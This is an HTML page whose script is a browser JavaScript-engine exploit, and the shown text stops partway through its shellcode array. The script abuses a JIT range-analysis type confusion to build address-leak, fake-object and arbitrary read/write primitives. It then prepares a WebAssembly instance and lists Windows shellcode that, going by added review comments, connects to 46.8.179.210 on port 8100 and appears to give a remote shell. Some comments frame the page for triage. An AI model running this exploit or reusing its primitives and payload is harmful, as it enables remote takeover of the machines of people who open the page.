
<html>

<head>
</head>

<body>
    exp
    <br>
</body>
<script>
    // Scratch 16-byte buffer shared by the bit-reinterpretation helpers below.
    // Every helper writes at offset 0 before it reads, so no state carries
    // over from one call to the next.
    var dv = new DataView(new ArrayBuffer(0x10));

    // f2big: raw IEEE-754 bits of the double `f` as an unsigned 64-bit BigInt.
    function f2big(f) {
        const littleEndian = true;
        dv.setFloat64(0, f, littleEndian);
        const bits = dv.getBigUint64(0, littleEndian);
        return bits;
    }

    // big2f: inverse of f2big. Both accesses use DataView's default
    // (big-endian) byte order, so the write and the read still agree.
    function big2f(b) {
        const littleEndian = false;
        dv.setBigUint64(0, b, littleEndian);
        return dv.getFloat64(0, littleEndian);
    }

    // flow: low 32 bits of the double's bit pattern, as an unsigned integer.
    function flow(f) {
        const littleEndian = true;
        dv.setFloat64(0, f, littleEndian);
        const lowWord = dv.getUint32(0, littleEndian);
        return lowWord;
    }

    // fhi: high 32 bits of the double's bit pattern, as an unsigned integer.
    function fhi(f) {
        const littleEndian = true;
        dv.setFloat64(0, f, littleEndian);
        const highWord = dv.getUint32(4, littleEndian);
        return highWord;
    }

    // i2f: build a double from its low and high 32-bit words.
    function i2f(low, hi) {
        const littleEndian = true;
        const words = [low, hi];
        words.forEach((word, index) => {
            dv.setUint32(index * 4, word, littleEndian);
        });
        return dv.getFloat64(0, littleEndian);
    }
    // print: show `text` in a modal alert, with the literal "<br>" appended.
    function print(text) {
        const suffix = "<br>";
        alert(text + suffix);
    }
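    // One 8-byte buffer viewed as a double, a 64-bit unsigned integer and two
    // 32-bit unsigned integers. Declared explicitly: the original assigned to
    // undeclared names, which creates implicit globals and throws a
    // ReferenceError in strict mode or in a module.
    const cvt_buf = new ArrayBuffer(8);
    const cvt_f64a = new Float64Array(cvt_buf);
    const cvt_u64a = new BigUint64Array(cvt_buf);
    const cvt_u32a = new Uint32Array(cvt_buf);

    // ftoi: raw IEEE-754 bits of the double `f` as an unsigned 64-bit BigInt.
    function ftoi(f) { // float -> bigint
        cvt_f64a[0] = f;
        return cvt_u64a[0];
    }

    // itof: the double whose bit pattern is `i`. `i` may be a BigInt or any
    // value BigInt() accepts; a non-integer Number makes BigInt() throw.
    function itof(i) { // bigint -> float
        cvt_u64a[0] = BigInt(i);
        return cvt_f64a[0];
    }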
    // lower: remainder of the BigInt `i` modulo 2^32, converted to a Number.
    function lower(i) {
        const TWO_POW_32 = 1n << 32n;
        const lowWord = i % TWO_POW_32;
        return Number(lowWord);
    }
    // upper: the BigInt `i` divided by 2^32 (truncating), converted to a Number.
    function upper(i) {
        const TWO_POW_32 = 1n << 32n;
        const highWord = i / TWO_POW_32;
        return Number(highWord);
    }
    // pair: combine a high word `h` and a low word `l` into h * 2^32 + l,
    // returned as a BigInt.
    function pair(h, l) {
        const highPart = BigInt(h) << 32n;
        const lowPart = BigInt(l);
        return highPart + lowPart;
    }
    // todo
    // leak_array_map: returns [v0.value, v1.value, arr2], i.e. the values
    // produced by the 14th and 15th next() calls on `arr`'s iterator, plus the
    // local array `arr2`. `obj` and `flag` are accepted but never read.
    //
    // Evaluated as plain JavaScript with `arg_true` truthy, `c0` is 0, `ra` and
    // `rb` are both -1 and `confused` is 0, so `arr` has 33 slots and every
    // next() past index 1 yields undefined. The author's inline note records
    // that optimised code instead sees `confused` typed as Range(0,0) while
    // its runtime value is -1, which would make `arr` a 3-slot array that the
    // iterator then walks well past.
    // NOTE(review): the affected engine and version are not stated on this
    // page - identify the corresponding fix before using this as a regression
    // input.
    // Defender note: in a correct engine this function can only return
    // undefined for the first two entries; any other result means the
    // compiler's range analysis and the runtime disagree.
    function leak_array_map(arg_true, obj, flag) {
        let o = { ct: true, c0: 0, c1: 1 };
        let aa = arg_true ? 8 : "7"; // number on the path exercised here, string otherwise
        let c0 = (Math.max(aa, 0) + aa - 16); // 0 when aa is 8
        let v01 = 2 ** 32 + (o.c0 & 1);
        let xx = 2 ** 32 - 1;
        let ra = (xx >>> c0) - v01;
        let rb = ((xx - 2 ** 32) << (32 - c0));
        let confused = (ra ^ rb) >> 31; // Range(0,0); is: -1
        let arr = new Array(3 + 30 * (1 + confused)); // length 33 if confused is 0, 3 if it is -1
        arr[0] = 1e64; // make sure arr is of type double
        arr[1] = 2e64;
        let arr2 = new Array(10);//[1337.5, 1338.5, 1339.5]; // arr2 is of type double too
        for (var i = 0; i < 10; i++) arr2[i] = i + 1337.5;
        let iter = arr[Symbol.iterator]();
        // 13 next() calls whose results are discarded
        iter.next(); iter.next(); iter.next();
        iter.next();
        iter.next(); iter.next(); iter.next(); iter.next(); iter.next(); iter.next(); iter.next(); iter.next(); iter.next();
        // v0 should be the last element of arr2 (author's expectation)
        let v0 = iter.next();
        let v1 = iter.next();
        return [v0.value, v1.value, arr2];
    }
    // leak_addr_helper: returns the value produced by the fifth next() call on
    // `arr`'s iterator. `obj` is stored in the local array `arr2`; `flag` is
    // never read.
    //
    // The arithmetic that produces `confused` is the same sequence used in
    // leak_array_map. As plain JavaScript it yields 0 (a 33-slot `arr`, so the
    // fifth next() returns undefined). Presumably the optimised build sees -1,
    // as the author notes in leak_array_map, giving a 3-slot array.
    // Defender note: `arr` holds a double while `arr2` holds object
    // references, so a non-undefined return here would be a double whose bits
    // did not come from `arr` - which is why callers reinterpret the result
    // with fhi().
    function leak_addr_helper(arg_true, obj, flag) {
        let o = { ct: true, c0: 0, c1: 1 };
        let aa = arg_true ? 8 : "7";
        let c0 = (Math.max(aa, 0) + aa - 16); // 0 when aa is 8
        let v01 = 2 ** 32 + (o.c0 & 1);
        let xx = 2 ** 32 - 1;
        let ra = (xx >>> c0) - v01;
        let rb = ((xx - 2 ** 32) << (32 - c0));
        let confused = (ra ^ rb) >> 31;
        let arr = new Array(3 + 30 * (1 + confused)); // length 33 if confused is 0, 3 if it is -1
        arr[0] = 0.5;
        let arr2 = new Array(5); for (var idx = 0; idx < 5; idx += 1) arr2[idx] = {};
        arr2[1] = obj;
        arr2[0] = 0x1337;
        let iter = arr[Symbol.iterator]();
        // four next() calls whose results are discarded
        iter.next(); iter.next(); iter.next(); iter.next();
        let v1 = iter.next().value;
        return v1;
    }
    // fake_obj_helper: returns [v0.value, v1.value], the values produced by
    // the fifth and sixth next() calls on `arr`'s iterator. `val` is stored in
    // slot 0 of the local array `arr2`; `flag` is never read.
    //
    // The arithmetic that produces `confused` is the same sequence used in
    // leak_array_map and leak_addr_helper; as plain JavaScript it yields 0 and
    // both returned values are undefined.
    // Defender note: here `arr` is initialised with an integer and `arr2` with
    // doubles, the reverse of leak_addr_helper; a non-undefined second result
    // would mean bits written as a double were handed back as a JavaScript
    // value of another kind.
    function fake_obj_helper(arg_true, val, flag) {
        let o = { ct: true, c0: 0, c1: 1 };
        let aa = arg_true ? 8 : "7";
        let c0 = (Math.max(aa, 0) + aa - 16); // 0 when aa is 8
        let v01 = 2 ** 32 + (o.c0 & 1);
        let xx = 2 ** 32 - 1;
        let ra = (xx >>> c0) - v01;
        let rb = ((xx - 2 ** 32) << (32 - c0));
        let confused = (ra ^ rb) >> 31;
        let arr = new Array(3 + 30 * (1 + confused)); // length 33 if confused is 0, 3 if it is -1
        arr[0] = 0; // smi and obj have different heap layouts; do not change this
        let arr2 = new Array(5); for (var idx = 0; idx < 5; idx += 1) arr2[idx] = 0.0;
        arr2[0] = val;
        let iter = arr[Symbol.iterator]();
        // four next() calls whose results are discarded
        iter.next(); iter.next(); iter.next();
        iter.next();
        // v0 should be the length of arr2, i.e. 5 (author's expectation)
        let v0 = iter.next();
        let v1 = iter.next();
        return [v0.value, v1.value];
    }
    // print("start");
    // Warm-up phase: each helper is called 3000 times with the same argument
    // shapes before it is used for real; the author's commented-out markers
    // ("jit1", "jit2", "end of jit optimization") indicate the intent is to
    // get the helpers compiled by the optimising tier.
    // Defender note: tight loops of a few thousand identical calls ahead of a
    // single "real" call are a recognisable shape when triaging a suspicious
    // script. The loop counter `i` is an undeclared (implicit global) variable.
    let obj = new Array(128);
    for (i = 0; i < 3000; i += 1) leak_addr_helper(true, obj, false);
    // alert("jit1");
    let arr = new Array(128);
    for (i = 0; i < 3000; i += 1) {
        leak_array_map(true, arr, false);
    }
    // print("jit2");
    for (i = 0; i < 3000; i += 1) fake_obj_helper(true, 2.567347528655259e-289, false);
    fake_obj_helper(true, 1.2132797677859895e-279, true);
    // alert("end of jit optimization");
    // First call whose result is kept: only element 1 of the returned array
    // is used from here on.
    var res = leak_array_map(true, arr, true);
    let array_map_leak = res[1];
    // print("anchor data = 0x" + (ftoi(res[0])).toString(16) + " | " + res[0]);
    // print("array_map_leak = 0x" + (ftoi(res[1])).toString(16) + " | " + res[1]);
    // addrof: passes `obj` to leak_addr_helper and returns the upper 32 bits
    // (via fhi) of the double that comes back.
    // NOTE(review): on an engine where leak_addr_helper behaves per the
    // language semantics, it returns undefined and fhi() then operates on NaN;
    // a meaningful result exists only on an affected build.
    function addrof(obj) {
        let f = leak_addr_helper(true, obj, true);
        return fhi(f);
    }
    // fakeobj: encodes `addr` into both 32-bit halves of a double, passes that
    // double to fake_obj_helper and returns the second element of its result.
    // `addr` must be an integer: pair() calls BigInt() on it.
    function fakeobj(addr) {
        // given a tagged, compressed pointer, return the fake object at that place
        let f = itof(pair(addr, addr));
        let res = fake_obj_helper(true, f, true);
        // print("[*]res[0]:" + res[0])
        return res[1];
    }
    // Builds the array `rw_arr` of six doubles, whose fourth element is the
    // value captured earlier in `array_map_leak`, and asks fakeobj() for a
    // value located at rw_arr_addr + 0x20 + 0x18.
    // `foo_content_addr` is computed but only referenced from a commented-out
    // print. The constants 32, 0x20 and 0x18 are layout-dependent; the page
    // does not say which engine build they were measured on.
    let foo_arr = [1.1, 1.1, 1.1, 1.1, 1.1];
    let foo_content_addr = addrof(foo_arr) + 32;
    //print("[*] foo_content_addr:" + foo_content_addr.toString(16));
    let rw_arr = [itof(pair(0x13361336, 0x13361336)), 1.1, 0.0, array_map_leak, 60.0, 0.0];
    let rw_arr_addr = addrof(rw_arr);
    //print("[*] rw_arr_addr:" + rw_arr_addr.toString(16));
    let rw_arr_content_addr = rw_arr_addr + 0x20;
    //print("[*] rw_arr_content_addr:" + rw_arr_content_addr.toString(16));
    let r = fakeobj(rw_arr_content_addr + 0x18);
    //alert("typeof:" + typeof (r));
    // read64: stores a double encoding pair(50, (addr | 1) - 8) into
    // rw_arr[4], then returns the bits of r[0] as a BigInt.
    // Depends on the outer `rw_arr` and `r`; it has no meaning unless `r` was
    // produced by fakeobj() on an affected build.
    function read64(addr) {
        rw_arr[4] = itof(pair(50, (addr | 1) - 8));
        return ftoi(r[0]);
    }
    // write64: stores the same encoding as read64 into rw_arr[4], then assigns
    // the double whose bit pattern is `data` to r[0].
    // Depends on the outer `rw_arr` and `r`, like read64.
    function write64(addr, data) {
        rw_arr[4] = itof(pair(50, (addr | 1) - 8));
        r[0] = itof(data);
    }
    // print("before alloc wasm");
    // Minimal WebAssembly module: one function of type () -> i32 whose body is
    // `i32.const 42; end`, exported as "main", plus an exported "memory".
    // The module does no useful work itself; the script only keeps the
    // instance and the exported function `f`.
    var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
    var wasmModule = new WebAssembly.Module(wasmCode);
    var wasmInstance = new WebAssembly.Instance(wasmModule, {});
    var f = wasmInstance.exports.main;
    // print("after alloc wasm");
    let wasm_instance_addr = addrof(wasmInstance) - 1;
    //print("[*] wasm_instance_addr 0x" + wasm_instance_addr.toString(16));
    // NOTE(review), for triage of the `shellcode` array that follows: the bytes
    // read as 32-bit x86 routines (each begins 55 8B EC) and include
    // 64 A1 30 00 00 00, a read of fs:[0x30], so the payload looks
    // Windows-specific. Immediate operands spell out ASCII strings usable as
    // indicators: "46.8.179.210" with the constant 0x1FA4 (8100) stored next
    // to it, "Ws2_32.dll", "WSOCK32.dll", "user32.dll", "Ole32.dll",
    // "ShellStdio", "computer information", "Hello World!" and "1100".."1400".
    // Presumably a socket client for that address and port; confirm in a
    // disassembler on an isolated analysis host before relying on this.
    var shellcode = [
	0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0xC7, 0x45, 0xEC, 0x34, 0x36, 0x2E, 0x38, 0xC7, 0x45, 0xF0,
	0x2E, 0x31, 0x37, 0x39, 0xC7, 0x45, 0xF4, 0x2E, 0x32, 0x31, 0x30, 0xC7, 0x45, 0xF8, 0x00, 0x00,
	0x00, 0x00, 0xC7, 0x45, 0xFC, 0xA4, 0x1F, 0x00, 0x00, 0xE8, 0x12, 0x00, 0x00, 0x00, 0x8B, 0xE5,
	0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
	0x55, 0x8B, 0xEC, 0x81, 0xEC, 0x70, 0x05, 0x00, 0x00, 0xC7, 0x85, 0x0C, 0xFF, 0xFF, 0xFF, 0x34,
	0x36, 0x2E, 0x38, 0xC7, 0x85, 0x10, 0xFF, 0xFF, 0xFF, 0x2E, 0x31, 0x37, 0x39, 0xC7, 0x85, 0x14,
	0xFF, 0xFF, 0xFF, 0x2E, 0x32, 0x31, 0x30, 0xC7, 0x85, 0x18, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00,
	0x00, 0xC7, 0x85, 0x48, 0xFF, 0xFF, 0xFF, 0xA4, 0x1F, 0x00, 0x00, 0xC6, 0x45, 0xE8, 0x31, 0xC6,
	0x45, 0xE9, 0x31, 0xC6, 0x45, 0xEA, 0x30, 0xC6, 0x45, 0xEB, 0x30, 0xC6, 0x45, 0xEC, 0x00, 0xC6,
	0x45, 0x80, 0x31, 0xC6, 0x45, 0x81, 0x32, 0xC6, 0x45, 0x82, 0x30, 0xC6, 0x45, 0x83, 0x30, 0xC6,
	0x45, 0x84, 0x00, 0xC6, 0x45, 0xE0, 0x31, 0xC6, 0x45, 0xE1, 0x33, 0xC6, 0x45, 0xE2, 0x30, 0xC6,
	0x45, 0xE3, 0x30, 0xC6, 0x45, 0xE4, 0x00, 0xC6, 0x45, 0x88, 0x31, 0xC6, 0x45, 0x89, 0x34, 0xC6,
	0x45, 0x8A, 0x30, 0xC6, 0x45, 0x8B, 0x30, 0xC6, 0x45, 0x8C, 0x00, 0xC6, 0x45, 0xC8, 0x75, 0xC6,
	0x45, 0xC9, 0x73, 0xC6, 0x45, 0xCA, 0x65, 0xC6, 0x45, 0xCB, 0x72, 0xC6, 0x45, 0xCC, 0x33, 0xC6,
	0x45, 0xCD, 0x32, 0xC6, 0x45, 0xCE, 0x2E, 0xC6, 0x45, 0xCF, 0x64, 0xC6, 0x45, 0xD0, 0x6C, 0xC6,
	0x45, 0xD1, 0x6C, 0xC6, 0x45, 0xD2, 0x00, 0xC6, 0x45, 0xB0, 0x53, 0xC6, 0x45, 0xB1, 0x68, 0xC6,
	0x45, 0xB2, 0x65, 0xC6, 0x45, 0xB3, 0x6C, 0xC6, 0x45, 0xB4, 0x6C, 0xC6, 0x45, 0xB5, 0x53, 0xC6,
	0x45, 0xB6, 0x74, 0xC6, 0x45, 0xB7, 0x64, 0xC6, 0x45, 0xB8, 0x69, 0xC6, 0x45, 0xB9, 0x6F, 0xC6,
	0x45, 0xBA, 0x00, 0xC6, 0x45, 0x94, 0x48, 0xC6, 0x45, 0x95, 0x65, 0xC6, 0x45, 0x96, 0x6C, 0xC6,
	0x45, 0x97, 0x6C, 0xC6, 0x45, 0x98, 0x6F, 0xC6, 0x45, 0x99, 0x20, 0xC6, 0x45, 0x9A, 0x57, 0xC6,
	0x45, 0x9B, 0x6F, 0xC6, 0x45, 0x9C, 0x72, 0xC6, 0x45, 0x9D, 0x6C, 0xC6, 0x45, 0x9E, 0x64, 0xC6,
	0x45, 0x9F, 0x21, 0xC6, 0x45, 0xA0, 0x00, 0xC6, 0x85, 0x74, 0xFF, 0xFF, 0xFF, 0x4F, 0xC6, 0x85,
	0x75, 0xFF, 0xFF, 0xFF, 0x6C, 0xC6, 0x85, 0x76, 0xFF, 0xFF, 0xFF, 0x65, 0xC6, 0x85, 0x77, 0xFF,
	0xFF, 0xFF, 0x33, 0xC6, 0x85, 0x78, 0xFF, 0xFF, 0xFF, 0x32, 0xC6, 0x85, 0x79, 0xFF, 0xFF, 0xFF,
	0x2E, 0xC6, 0x85, 0x7A, 0xFF, 0xFF, 0xFF, 0x64, 0xC6, 0x85, 0x7B, 0xFF, 0xFF, 0xFF, 0x6C, 0xC6,
	0x85, 0x7C, 0xFF, 0xFF, 0xFF, 0x6C, 0xC6, 0x85, 0x7D, 0xFF, 0xFF, 0xFF, 0x00, 0xC6, 0x45, 0xBC,
	0x57, 0xC6, 0x45, 0xBD, 0x73, 0xC6, 0x45, 0xBE, 0x32, 0xC6, 0x45, 0xBF, 0x5F, 0xC6, 0x45, 0xC0,
	0x33, 0xC6, 0x45, 0xC1, 0x32, 0xC6, 0x45, 0xC2, 0x2E, 0xC6, 0x45, 0xC3, 0x64, 0xC6, 0x45, 0xC4,
	0x6C, 0xC6, 0x45, 0xC5, 0x6C, 0xC6, 0x45, 0xC6, 0x00, 0x68, 0x4C, 0x77, 0x26, 0x07, 0xE8, 0x7D,
	0x07, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xF4, 0xC6, 0x45, 0xD4, 0x4F, 0xC6, 0x45, 0xD5,
	0x6C, 0xC6, 0x45, 0xD6, 0x65, 0xC6, 0x45, 0xD7, 0x33, 0xC6, 0x45, 0xD8, 0x32, 0xC6, 0x45, 0xD9,
	0x2E, 0xC6, 0x45, 0xDA, 0x64, 0xC6, 0x45, 0xDB, 0x6C, 0xC6, 0x45, 0xDC, 0x6C, 0xC6, 0x45, 0xDD,
	0x00, 0xC6, 0x45, 0xA4, 0x57, 0xC6, 0x45, 0xA5, 0x53, 0xC6, 0x45, 0xA6, 0x4F, 0xC6, 0x45, 0xA7,
	0x43, 0xC6, 0x45, 0xA8, 0x4B, 0xC6, 0x45, 0xA9, 0x33, 0xC6, 0x45, 0xAA, 0x32, 0xC6, 0x45, 0xAB,
	0x2E, 0xC6, 0x45, 0xAC, 0x64, 0xC6, 0x45, 0xAD, 0x6C, 0xC6, 0x45, 0xAE, 0x6C, 0xC6, 0x45, 0xAF,
	0x00, 0x8D, 0x45, 0xA4, 0x50, 0xFF, 0x55, 0xF4, 0x89, 0x85, 0xFC, 0xFE, 0xFF, 0xFF, 0x8D, 0x4D,
	0xD4, 0x51, 0xFF, 0x55, 0xF4, 0x89, 0x85, 0x04, 0xFF, 0xFF, 0xFF, 0x8D, 0x55, 0xC8, 0x52, 0xFF,
	0x55, 0xF4, 0x89, 0x85, 0x08, 0xFF, 0xFF, 0xFF, 0x8D, 0x45, 0xBC, 0x50, 0xFF, 0x55, 0xF4, 0x89,
	0x85, 0x00, 0xFF, 0xFF, 0xFF, 0x68, 0x45, 0x83, 0x56, 0x07, 0xE8, 0xE1, 0x06, 0x00, 0x00, 0x83,
	0xC4, 0x04, 0x89, 0x85, 0x38, 0xFF, 0xFF, 0xFF, 0x68, 0xC6, 0x96, 0x87, 0x52, 0xE8, 0xCE, 0x06,
	0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0x68, 0xFF, 0xFF, 0xFF, 0x68, 0x79, 0xCC, 0x3F, 0x86,
	0xE8, 0xBB, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0x54, 0xFF, 0xFF, 0xFF, 0x68, 0x44,
	0xF0, 0x35, 0xE0, 0xE8, 0xA8, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0xF8, 0xFE, 0xFF,
	0xFF, 0x68, 0x40, 0xE2, 0x61, 0x78, 0xE8, 0x95, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85,
	0x40, 0xFF, 0xFF, 0xFF, 0x68, 0x7C, 0xF4, 0x8E, 0xFE, 0xE8, 0x82, 0x06, 0x00, 0x00, 0x83, 0xC4,
	0x04, 0x89, 0x85, 0x44, 0xFF, 0xFF, 0xFF, 0x68, 0x1F, 0x9E, 0x52, 0xEC, 0xE8, 0x6F, 0x06, 0x00,
	0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0x3C, 0xFF, 0xFF, 0xFF, 0x68, 0xB1, 0x66, 0x28, 0x7F, 0xE8,
	0x5C, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0x64, 0xFF, 0xFF, 0xFF, 0x68, 0x48, 0xE4,
	0x16, 0xEA, 0xE8, 0x49, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x45, 0x90, 0x68, 0x88, 0xD1,
	0xA6, 0xEA, 0xE8, 0x39, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0x6C, 0xFF, 0xFF, 0xFF,
	0x68, 0xFB, 0x66, 0x2B, 0xEC, 0xE8, 0x26, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x89, 0x85, 0x34,
	0xFF, 0xFF, 0xFF, 0x68, 0x98, 0x16, 0x59, 0xD8, 0xE8, 0x13, 0x06, 0x00, 0x00, 0x83, 0xC4, 0x04,
	0x89, 0x85, 0xF4, 0xFE, 0xFF, 0xFF, 0x68, 0x2F, 0x21, 0x12, 0x0B, 0xE8, 0x00, 0x06, 0x00, 0x00,
	0x83, 0xC4, 0x04, 0x89, 0x85, 0x4C, 0xFF, 0xFF, 0xFF, 0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00,
	0xC7, 0x45, 0xF0, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x64, 0x04, 0x00, 0x00, 0x89, 0x85, 0x50, 0xFF,
	0xFF, 0xFF, 0x83, 0xBD, 0x50, 0xFF, 0xFF, 0xFF, 0x00, 0x75, 0x07, 0x33, 0xC0, 0xE9, 0xAE, 0x02,
	0x00, 0x00, 0x8D, 0x8D, 0x0C, 0xFF, 0xFF, 0xFF, 0x51, 0xFF, 0x95, 0x4C, 0xFF, 0xFF, 0xFF, 0x89,
	0x85, 0x70, 0xFF, 0xFF, 0xFF, 0x83, 0xBD, 0x70, 0xFF, 0xFF, 0xFF, 0x00, 0x75, 0x07, 0x33, 0xC0,
	0xE9, 0x8B, 0x02, 0x00, 0x00, 0xBA, 0x02, 0x00, 0x00, 0x00, 0x66, 0x89, 0x95, 0xE4, 0xFE, 0xFF,
	0xFF, 0xB8, 0x04, 0x00, 0x00, 0x00, 0x6B, 0xC8, 0x00, 0x8B, 0x95, 0x70, 0xFF, 0xFF, 0xFF, 0x8B,
	0x42, 0x0C, 0x8B, 0x0C, 0x01, 0x8B, 0x11, 0x89, 0x95, 0xE8, 0xFE, 0xFF, 0xFF, 0x8B, 0x85, 0x48,
	0xFF, 0xFF, 0xFF, 0x50, 0xFF, 0x95, 0x44, 0xFF, 0xFF, 0xFF, 0x66, 0x89, 0x85, 0xE6, 0xFE, 0xFF,
	0xFF, 0x6A, 0x00, 0x6A, 0x01, 0x6A, 0x02, 0xFF, 0x95, 0x40, 0xFF, 0xFF, 0xFF, 0x89, 0x45, 0xFC,
	0x6A, 0x10, 0x8D, 0x8D, 0xE4, 0xFE, 0xFF, 0xFF, 0x51, 0x8B, 0x55, 0xFC, 0x52, 0xFF, 0x95, 0x3C,
	0xFF, 0xFF, 0xFF, 0x83, 0xF8, 0xFF, 0x75, 0x1F, 0xFF, 0x95, 0x64, 0xFF, 0xFF, 0xFF, 0x6A, 0x00,
	0x8D, 0x45, 0xB0, 0x50, 0x8D, 0x4D, 0x94, 0x51, 0x6A, 0x00, 0xFF, 0x95, 0x38, 0xFF, 0xFF, 0xFF,
	0x33, 0xC0, 0xE9, 0x09, 0x02, 0x00, 0x00, 0xC7, 0x85, 0x1C, 0xFF, 0xFF, 0xFF, 0x63, 0x6F, 0x6D,
	0x70, 0xC7, 0x85, 0x20, 0xFF, 0xFF, 0xFF, 0x75, 0x74, 0x65, 0x72, 0xC7, 0x85, 0x24, 0xFF, 0xFF,
	0xFF, 0x20, 0x69, 0x6E, 0x66, 0xC7, 0x85, 0x28, 0xFF, 0xFF, 0xFF, 0x6F, 0x72, 0x6D, 0x61, 0xC7,
	0x85, 0x2C, 0xFF, 0xFF, 0xFF, 0x74, 0x69, 0x6F, 0x6E, 0xC7, 0x85, 0x30, 0xFF, 0xFF, 0xFF, 0x00,
	0x00, 0x00, 0x00, 0x6A, 0x00, 0x8D, 0x95, 0x1C, 0xFF, 0xFF, 0xFF, 0x52, 0xE8, 0x1F, 0x09, 0x00,
	0x00, 0x83, 0xC4, 0x04, 0x83, 0xC0, 0x01, 0x50, 0x8D, 0x85, 0x1C, 0xFF, 0xFF, 0xFF, 0x50, 0x8B,
	0x4D, 0xFC, 0x51, 0xFF, 0x55, 0x90, 0x89, 0x45, 0xF8, 0x83, 0x7D, 0xF8, 0x00, 0x7D, 0x07, 0x33,
	0xC0, 0xE9, 0x9A, 0x01, 0x00, 0x00, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x85, 0xD2, 0x0F, 0x84, 0x78,
	0x01, 0x00, 0x00, 0x6A, 0x00, 0x6A, 0x0A, 0x8D, 0x85, 0x58, 0xFF, 0xFF, 0xFF, 0x50, 0xE8, 0xAD,
	0x03, 0x00, 0x00, 0x83, 0xC4, 0x0C, 0x6A, 0x00, 0x6A, 0x0A, 0x8D, 0x8D, 0x58, 0xFF, 0xFF, 0xFF,
	0x51, 0x8B, 0x55, 0xFC, 0x52, 0xFF, 0x95, 0x6C, 0xFF, 0xFF, 0xFF, 0x89, 0x45, 0xF0, 0x83, 0x7D,
	0xF0, 0x00, 0x7F, 0x05, 0xE9, 0x42, 0x01, 0x00, 0x00, 0x6A, 0x00, 0x8D, 0x85, 0x58, 0xFF, 0xFF,
	0xFF, 0x50, 0xE8, 0xA9, 0x08, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x50, 0x8D, 0x8D, 0x58, 0xFF, 0xFF,
	0xFF, 0x51, 0x8B, 0x55, 0xFC, 0x52, 0xFF, 0x55, 0x90, 0x89, 0x45, 0xF8, 0x83, 0x7D, 0xF8, 0x00,
	0x7D, 0x05, 0xE9, 0x14, 0x01, 0x00, 0x00, 0x8D, 0x45, 0xE8, 0x50, 0x8D, 0x8D, 0x58, 0xFF, 0xFF,
	0xFF, 0x51, 0xE8, 0x29, 0x01, 0x00, 0x00, 0x83, 0xC4, 0x08, 0x85, 0xC0, 0x75, 0x11, 0x8B, 0x55,
	0xFC, 0x52, 0xE8, 0xB9, 0x01, 0x00, 0x00, 0x83, 0xC4, 0x04, 0xE9, 0xE7, 0x00, 0x00, 0x00, 0x8D,
	0x45, 0xE0, 0x50, 0x8D, 0x8D, 0x58, 0xFF, 0xFF, 0xFF, 0x51, 0xE8, 0x01, 0x01, 0x00, 0x00, 0x83,
	0xC4, 0x08, 0x85, 0xC0, 0x0F, 0x85, 0xC7, 0x00, 0x00, 0x00, 0x6A, 0x00, 0x68, 0x00, 0x04, 0x00,
	0x00, 0x8D, 0x95, 0x90, 0xFA, 0xFF, 0xFF, 0x52, 0xE8, 0x03, 0x03, 0x00, 0x00, 0x83, 0xC4, 0x0C,
	0x6A, 0x00, 0x68, 0x00, 0x04, 0x00, 0x00, 0x8D, 0x85, 0x90, 0xFA, 0xFF, 0xFF, 0x50, 0x8B, 0x4D,
	0xFC, 0x51, 0xFF, 0x95, 0x6C, 0xFF, 0xFF, 0xFF, 0x89, 0x45, 0xF0, 0x83, 0x7D, 0xF0, 0x00, 0x7F,
	0x05, 0xE9, 0x95, 0x00, 0x00, 0x00, 0x6A, 0x00, 0x8D, 0x95, 0x90, 0xFA, 0xFF, 0xFF, 0x52, 0xE8,
	0xFC, 0x07, 0x00, 0x00, 0x83, 0xC4, 0x04, 0x83, 0xC0, 0x01, 0x50, 0x8D, 0x85, 0x90, 0xFA, 0xFF,
	0xFF, 0x50, 0x8B, 0x4D, 0xFC, 0x51, 0xFF, 0x55, 0x90, 0x89, 0x45, 0xF8, 0x83, 0x7D, 0xF8, 0x00,
	0x7D, 0x02, 0xEB, 0x67, 0x6A, 0x00, 0x6A, 0x44, 0x8D, 0x95, 0x90, 0xFE, 0xFF, 0xFF, 0x52, 0xE8,
	0x9C, 0x02, 0x00, 0x00, 0x83, 0xC4, 0x0C, 0x8D, 0x85, 0xD4, 0xFE, 0xFF, 0xFF, 0x50, 0x8D, 0x8D,
	0x90, 0xFE, 0xFF, 0xFF, 0x51, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A,
	0x00, 0x8D, 0x95, 0x90, 0xFA, 0xFF, 0xFF, 0x52, 0x6A, 0x00, 0xFF, 0x95, 0x54, 0xFF, 0xFF, 0xFF,
	0x8B, 0x85, 0xD4, 0xFE, 0xFF, 0xFF, 0x50, 0xFF, 0x95, 0x68, 0xFF, 0xFF, 0xFF, 0x8B, 0x8D, 0xD8,
	0xFE, 0xFF, 0xFF, 0x51, 0xFF, 0x95, 0x68, 0xFF, 0xFF, 0xFF, 0xE9, 0x87, 0xFE, 0xFF, 0xFF, 0xEB,
